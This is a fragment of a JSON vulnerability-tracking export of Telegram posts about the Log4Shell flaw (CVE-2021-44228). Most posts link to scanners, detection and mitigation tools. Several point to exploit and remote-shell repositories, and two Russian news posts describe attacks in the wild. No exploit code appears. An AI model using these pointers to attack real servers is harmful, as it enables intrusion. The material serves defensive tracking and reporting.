\\\"Log4Shell.\\\"\n\nhttps://github.com/alerithe/log4noshell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T10:42:01.000000Z"}, {"uuid": "79ae0b82-a6f3-4cfa-870b-824376766889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1383", "content": "#CVE-2021\n\nResearch into the implications of CVE-2021-44228 in Spring based applications.\n\nhttps://github.com/Camphul/log4shell-spring-framework-research\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T15:31:01.000000Z"}, {"uuid": "50a839b2-391e-49ba-96f5-471a5b217fb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1384", "content": "#CVE-2021\n#Log4j \nsimple python scanner to check if your network is vulnerable to CVE-2021-44228\n\nhttps://github.com/sinakeshmiri/log4jScan\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T16:03:01.000000Z"}, {"uuid": "abf3061b-2026-4864-a1fe-7ccc84029a27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1385", "content": "#CVE-2021\n#Log4j \n#Log4Shell \nBurp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.\n\nhttps://github.com/0xDexter0us/Log4J-Scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T16:30:28.000000Z"}, {"uuid": "a07c2fca-3382-4acd-9ad8-b486513be0c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1388", "content": "#CVE-2021\n\nMass recognition tool for CVE-2021-44228\n\nhttps://github.com/VNYui/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T17:44:01.000000Z"}, {"uuid": "6ec72ab4-b8f7-469e-b637-4d2b478083f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1533", "content": "#CVE-2021\n#Log4j \nA simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.\n\nhttps://github.com/lukepasek/log4jjndilookupremove\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:38:24.000000Z"}, {"uuid": "e68b8484-e6cd-45db-bd07-b01ca42c01cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1534", "content": "#CVE-2021\n#Log4j \nA vulnerable device scanner for CVE-2021-44228 (Log4j)\n\nhttps://github.com/sblmnl/Scan4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:42:01.000000Z"}, {"uuid": "78ed902e-6d64-43b9-94ff-b8e392a1416b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1536", "content": "#CVE-2021\n#Log4j \ncan find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046\n\nhttps://github.com/DANSI/PowerShell-Log4J-Scanner\n@BlueRedTeam", "creation_timestamp": "2021-12-18T01:57:32.000000Z"}, {"uuid": "c714d4c8-2c80-44d9-9ec3-e7cdb58527da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1538", "content": "#Blue_Team\n#Log4Shell \nNmap NSE scripts to check against log4shell/LogJam vulnerabilities (CVE-2021-44228)\n\nhttps://github.com/Diverto/nse-log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-18T06:17:04.000000Z"}, {"uuid": "0eac0fbb-c51a-4b04-814a-0fb74994ce07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1541", "content": "#CVE-2021\n#Log4j \nCVE-2021-44228 Getshell\n\nhttps://github.com/shakeman8/log4j_getshell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-18T14:01:58.000000Z"}, {"uuid": "cdbdc754-14ed-428f-8ca8-93943e331880", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1339", "content": "#BlueTeam\n#Blue_Team\nActiveScan++ extends Burp Suite's active and passive scanning capabilities\nhttps://github.com/PortSwigger/active-scan-plus-plus\n]-&gt; Log4Shell (CVE-2021-44228) detection to ActiveScan++:\nhttps://github.com/PortSwigger/active-scan-plus-plus/blob/master/activeScan++.py\n]-&gt; Log4j Analysis:\nhttps://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection\n\n@BlueRedTeam", "creation_timestamp": "2022-08-24T22:33:32.000000Z"}, {"uuid": "aa7cb17f-2c4e-4167-b086-fe984bc394e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1342", "content": "#CVE-2021\n#Log4j2\nA bare minimum proof-of-concept of Log4j2 JNDI Remote-Code-Execution vulnerability (CVE-2021-44228).\n\nhttps://github.com/unlimitedsola/log4j2-rce-poc\n\n@BlueRedTeam", "creation_timestamp": "2022-07-15T18:08:15.000000Z"}, {"uuid": "259ba896-f3dd-4265-be5f-dab8ee6b919d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1410", "content": "#CVE-2021\n#Log4\nLog4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS\n\nhttps://github.com/name/log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:39:01.000000Z"}, {"uuid": "2d90a586-9d04-4c6a-8810-4f85b6b22679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1411", "content": "#CVE-2021\n#Log4j\n\nTool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228\n\nhttps://github.com/alexbakker/log4shell-tools\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:42:01.000000Z"}, {"uuid": "04865d82-a157-4c9d-ab00-0c60130451dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1412", "content": "#CVE-2021\n#log4Shell \nFind log4j for CVE-2021-44228 on some places * Log4Shell\n\nhttps://github.com/perryflynn/find-log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:45:02.000000Z"}, {"uuid": "f295fcfe-77ff-46c5-a74a-a88a1b58c571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1542", "content": "#CVE-2021\n#Log4j \nSimple Python 3 script to detect the \\\"Log4j\\\" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading\n\nhttps://github.com/kal1gh0st/MyLog4Shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-18T14:04:17.000000Z"}, {"uuid": "d37c06b8-391f-4f0a-9129-b6303d0d2f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1547", "content": "#CVE-2021\n#Log4Shell\nSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.\n\nhttps://github.com/HynekPetrak/log4shell_finder\n\n@BlueRedTeam", "creation_timestamp": "2021-12-19T09:50:02.000000Z"}, {"uuid": "06d78a00-b623-48ca-95b5-085258d5d719", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1548", "content": "#CVE-2021\n#log4j \nVulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104\n\nhttps://github.com/TheInterception/Log4J-Simulation-Tool\n\n@BlueRedTeam", "creation_timestamp": "2021-12-19T10:03:53.000000Z"}, {"uuid": "a51252d9-5e6c-4057-b4fa-93714ab31ded", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/BlueRedTeam/1557", "content": "#CVE-2021\n#Log4j \n#CheetSheet\n\nLog4J CVE-2021-44228 : Mitigation Cheat Sheet\n\nhttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105\n\n@BlueRedTeam", "creation_timestamp": "2021-12-22T10:05:35.000000Z"}, {"uuid": "16f81b5f-5cdb-4d2a-9616-8327cedd5005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1600", "content": "#CVE-2021\n\nExploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.\n\nhttps://github.com/puzzlepeaches/Log4jHorizon\n\n@BlueRedTeam", "creation_timestamp": "2022-01-08T04:43:01.000000Z"}, {"uuid": "66d6da5f-32ff-433e-ae44-9517736bba87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1359", "content": "#CVE-2021\n#Log4J \nLog4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)\n\nhttps://github.com/corneacristian/Log4J-CVE-2021-44228-RCE\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T23:13:07.000000Z"}, {"uuid": "7ab7c512-6c0a-480c-9c1a-1919132d2145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/haccking/7084", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\nCVE-2021-44228. Python Log4RCE", "creation_timestamp": "2021-12-27T15:01:52.000000Z"}, {"uuid": "d115f45b-0ff8-4fbe-a9ad-e85f0475540b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/SecLabNews/11334", "content": "\u0412\u044b\u043f\u0443\u0449\u0435\u043d \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Log4j\n\n\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f Apache Software Foundation \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 ( CVE-2021-44228 ) \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Java Log4j\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u0443\u044e \u043e\u0446\u0435\u043d\u043a\u0443 \u0432 10 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0438 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043e\u0441\u043e\u0431\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0432\u044b\u043a\u043e\u0432.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 LunaSec, \u0441\u0435\u0440\u0432\u0435\u0440\u044b Apple, Amazon, Twitter, Steam, Tencent, Baidu, DIDI, JD, NetEase \u0438, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n https://www.securitylab.ru/news/527397.php", "creation_timestamp": "2021-12-10T22:53:05.000000Z"}, {"uuid": "d4af3489-26b0-49a5-b707-6d19964c50d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/SecLabNews/11343", "content": "\u200b\u200b\u0421\u0443\u0434\u043d\u0430\u044f \u043d\u043e\u0447\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f.\n \n0-day \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u043e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 LunaSec, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0432\u044b\u043a\u043e\u0432 \u0438 \u0443\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0434\u043d\u0443 \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u043a\u043e\u0434\u0430.\n \n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CVE-2021-44228 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apache Software Foundation \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java. Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase \u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a Log4Shell.\n \n\u0412\u0441\u0435 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043b\u043e\u0445\u043e, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 Apache Software Foundation \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043f\u043e\u0432\u043b\u0438\u044f\u043b\u043e \u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e. \u041a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0441\u043a\u0430\u043d\u044f\u0442 \u0441\u0435\u0442\u044c \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043d\u0430 LogJam.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043d\u0430 \u043f\u043e\u043c\u043e\u0449\u044c \u043f\u0440\u0438\u0448\u043b\u0438 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b: Cybereason \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0432\u0430\u043a\u0446\u0438\u043d\u0443 Logout4Shell \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f Log4Shell. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 LDAP \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java, \u043f\u043e \u0441\u0443\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 trustURLCodebase \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Log4j. \u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u0435\u0441\u043b\u0438 Logout4Shell \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u0431\u044b\u043b \u0431\u044b \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u044f\u043c, \u043d\u043e, \u0432 \u0431\u043e\u044e \u0432\u0441\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0445\u043e\u0440\u043e\u0448\u0438, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0435\u0433\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u0432.\n \n\u0410 \u0442\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043f\u043e\u043b\u044f\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0434\u044b\u0440\u0443 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0451\u043a.\n \n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Netlab 360, \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0433\u0440\u0443\u0437\u044f\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e Mirai, Muhstik \u0438 Kinsing, \u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0443\u043f\u043d\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0445 DDoS-\u0430\u0442\u0430\u043a. Microsoft 365 Defender Threat Intelligence \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4j \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 Cobalt Strike. \u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0442\u0435, \u043a\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 Log4Shell \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043c\u044f \u0445\u043e\u0441\u0442\u0430, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Log4j, \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 \u0438 \u0434\u0440.\n \n\u041d\u043e, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u043b\u0438\u0432\u043a\u0438 \u0441\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0440\u0430\u043d\u0435\u0435, \u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e 10 \u0434\u0435\u043a\u0430\u0431\u0440\u044f. \u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c Cloudflare \u0435\u0449\u0435 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Cisco Talos, \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e \u0434\u0435\u043a\u0430\u0431\u0440\u044f - \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c\u0441\u044f \u043f\u043e\u0437\u0436\u0435, \u0440\u0430\u0432\u043d\u043e \u0438 \u0442\u043e, \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0441\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441.\n \n\u041d\u0443, \u0430 \u043f\u043e\u043a\u0430, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-13T16:48:22.000000Z"}, {"uuid": "dce3e459-94a1-4730-adda-e2b7834adeb8", "vulnerability_lookup_origin": 